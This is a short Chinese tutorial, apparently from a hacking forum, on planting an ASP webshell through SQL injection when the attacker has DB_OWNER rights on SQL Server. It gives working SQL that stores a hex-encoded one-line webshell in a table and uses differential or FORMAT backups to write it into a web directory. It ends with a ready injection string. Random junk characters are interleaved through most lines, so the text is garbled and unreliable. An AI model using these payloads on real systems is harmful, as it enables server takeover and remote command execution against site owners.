DB_OWNER权限得到webshell的两点改进:1 y/ J2 u1 y" ]+ q" g4 a
D2 Y, } U9 m' V( P d" y! i5 b减少备份文件大小,得到可执行的webshell成功率提高不少 e' \! D# ` B4 M( s
一利用差异备份' E' D8 v( }: t/ Y- a# a
加一个参数WITH DIFFERENTIAL& Z& s/ ~. `1 ^8 h
( n6 t8 i: t4 l/ M3 T( y. r! ]1
R- a4 C0 b" I3 O2
0 D* C- J; I- ~( o4 x3. b& f0 E2 h: B( L" @' F1 T
4 w) j3 L: X1 Y! Y
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
# h. ]) n7 _: d+ O, i( _create table [dbo].[xiaolu] ([cmd] [image]);8 O/ Q6 c8 L; D
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
( b+ A6 `0 p0 u. udeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
) y0 T! O) P. a0 T: J& B/ @& P7 t ^* s9 k3 r. B. U
二利用完全FORMAT
$ g: Q) r5 I. @1 t! C6 X! H加一个参数WITH FROMAT
4 {8 X T1 j$ y* t6 t+ z+ ~有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以: c- z4 g/ X3 w/ ?; }# [
" Y, v( z2 K& k" P, R; A b: n" k1 T
1
6 L0 B# z/ d6 f+ ^& D- x5 h2
! ~; S# ~$ @+ }3
7 {6 T' [" s5 V* r7 ^" B) V" i& v49 p8 {! I- M; X' X
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
: ^( e& J v" b* O% Ocreate table [dbo].[xiaolu] ([cmd] [image]);
" J1 ~- Y# V2 n& b( p. Rinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)5 L$ \, K: e3 W; R2 T
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
~, L, f6 D1 W2 y5 Y: v7 C* M8 U m
总的来说就是那么简单几句,下面以备份数据库model为例子
% c, l9 r; t1 C. N. @3 K1
; |4 Q4 ?+ Z% d' e9 m9 K1 O* b6 o. p4 u% A: P1 ?$ a E
1, Q! G0 J/ ^) s6 ]+ H) }) B! v
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>') 0 b! L @0 s+ z5 P
! }6 w. j5 A% w2 T, l2
3 A% ^! y/ I8 |7 x9 ?5 [- X$ q" Y" L, O8 j, j
1
- g" h. g Z* g$ q& ?) V9 m5 w id=1;backup database model to disk='你的路径‘ with differential,format;-- , Q# E; p0 B! F B7 i0 {
|